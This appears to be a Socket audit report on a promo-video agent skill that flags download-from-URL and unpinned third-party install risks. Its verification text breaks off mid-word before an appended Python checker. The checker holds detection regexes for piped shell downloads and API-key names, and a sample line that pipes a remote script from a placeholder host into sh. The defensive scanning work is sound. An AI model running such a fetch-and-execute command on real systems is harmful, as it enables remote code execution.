guided-promo-video
Audited by Socket on Feb 22, 2026
1 alert found:
Malware [Skill Scanner]: Natural language instruction to download and install from URL detected

All findings:
- [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4]
- [HIGH] supply_chain: Installation of third-party script detected (SC006) [AITech 9.1.4]

Scanner assessment: The analyzed fragment is purpose-aligned and proportionate for a promo-video automation workflow. It relies on user input and standard external services (ElevenLabs, Helios CLI) with the usual credential-handling expectations. No evidence of data exfiltration, unauthorized control, or suspicious network activity was found. Treat as BENIGN with MEDIUM risk: the external API usage requires proper credential management and a secure transport for API calls.

LLM verification: The skill's stated purpose (guided promo-video creation) matches its capabilities, but it contains multiple supply-chain risk patterns: unpinned npm installs, direct instructions to install and run third-party tooling (npx helios), and an explicit flow that asks users to provide an ELEVEN_LABS_API_KEY (a sensitive credential). These are not definitive signs of malware, but they do create a meaningful attack surface (download-and-execute, potential credential exposure). Treat this skill as suspiciou
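The three patterns the findings above call out (a natural-language instruction to download and install from a URL, third-party tooling run unpinned via npm or npx, and a flow that asks the user for an API key) are text patterns a reviewer can check mechanically before installing a skill. The checker below is an added example, not Socket's scanner and not code from this skill: it scans skill text line by line, flags those patterns, and distinguishes an exact-version pin from an unpinned or range-pinned package. The rule names, severities, sample skill text, and the package version helios@1.4.2 are all constructed for illustration.

```python
"""Added example: a small static checker for supply-chain patterns in skill text.
Not Socket's scanner; rule names and sample text are constructed for illustration."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str      # hypothetical rule name, not a Socket rule ID
    severity: str
    line_no: int
    excerpt: str


SEVERITY_ORDER = ("LOW", "MEDIUM", "HIGH", "CRITICAL")

# Fetch from the network and pipe straight into a shell (download-and-execute).
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")
# Natural-language instruction to download/install something from a URL.
NL_INSTALL = re.compile(r"\b(download|install)\b[^.\n]*https?://\S+", re.IGNORECASE)
# `npm install <pkg>` / `npx <pkg>`; group 2 is the package spec (with any @version).
NPM_CMD = re.compile(
    r"\b(npm\s+(?:i|install)|npx)\s+(?:-[\w-]+\s+)*(@?[\w./-]+(?:@[\w.^~*-]+)?)"
)
# Environment-variable names that look like secrets.
SECRET_ENV = re.compile(r"\b[A-Z0-9_]*(?:API_KEY|SECRET|TOKEN|PASSWORD)\b")


def _unpinned(pkg: str) -> bool:
    """True unless the spec ends in an exact x.y.z pin (ranges and tags count as unpinned)."""
    name, sep, version = pkg.rpartition("@")
    if not sep or not name:  # no '@' after the name, or a bare '@scope/name'
        return True
    return not re.fullmatch(r"\d+\.\d+\.\d+", version)


def scan_skill_text(text: str) -> list[Finding]:
    """Return one Finding per pattern hit, in document order."""
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        if DOWNLOAD_EXEC.search(line):
            findings.append(Finding("download_and_execute", "CRITICAL", n, line.strip()))
        elif NL_INSTALL.search(line):
            findings.append(Finding("install_from_url", "HIGH", n, line.strip()))
        for m in NPM_CMD.finditer(line):
            if _unpinned(m.group(2)):
                findings.append(Finding("unpinned_npm_package", "HIGH", n, m.group(0)))
        for m in SECRET_ENV.finditer(line):
            findings.append(Finding("secret_in_instructions", "MEDIUM", n, m.group(0)))
    return findings


def highest_severity(findings: list[Finding]) -> str:
    """Worst severity present, or 'NONE' when the text is clean."""
    if not findings:
        return "NONE"
    return max((f.severity for f in findings), key=SEVERITY_ORDER.index)


# Constructed sample skill text (not the real guided-promo-video skill).
SAMPLE_SKILL = """\
# guided-promo-video (constructed sample, not the real skill text)
1. Install the renderer: npx helios render --script promo.json
2. Install the CLI globally: npm install -g helios
3. Voice-over uses ElevenLabs. Export ELEVEN_LABS_API_KEY before running.
4. Optional: download the sample assets from https://example.invalid/assets.zip and install them under ./assets
5. Never do this: curl -sSL https://example.invalid/setup.sh | sh
6. Pinned alternative: npx helios@1.4.2 render --script promo.json
"""

if __name__ == "__main__":
    results = scan_skill_text(SAMPLE_SKILL)
    for f in results:
        print(f"[{f.severity}] {f.rule} (line {f.line_no}): {f.excerpt}")
    print("overall:", highest_severity(results))
```

Running it against the sample reports the two unpinned `helios` invocations, the `ELEVEN_LABS_API_KEY` reference, the download-from-URL instruction, and the `curl | sh` line, while the exact-pinned `helios@1.4.2` line (a made-up version) passes. An exact pin is necessary but not sufficient; a lockfile or integrity hash is what actually ties the install to known bytes, and an API key requested in skill instructions should be supplied through a secret store or environment at run time, never pasted into the skill text.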